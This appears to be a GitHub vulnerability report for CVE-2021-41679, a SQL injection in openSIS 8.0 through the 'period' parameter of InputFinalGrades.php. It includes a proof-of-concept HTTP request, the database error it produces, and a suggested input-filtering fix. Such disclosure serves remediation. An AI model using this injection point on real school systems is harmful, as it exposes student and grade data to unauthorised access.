CVE-2021-41679: SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP · Issue #204 · OS4ED/openSIS-Classic

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.

POC:

REQUEST:

GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2’6 HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
SQL:
SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2’6

Traceback:
/var/www/opensis/modules/grades/InputFinalGrades.php at 55

Additional Information:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’6’ at line 1

[…]

SOLUTION:

Use function sqlSecurityFilter() before assign $_REQUEST[‘period’] into query "SELECT".

$period = sqlSecurityFilter($_REQUEST['period']);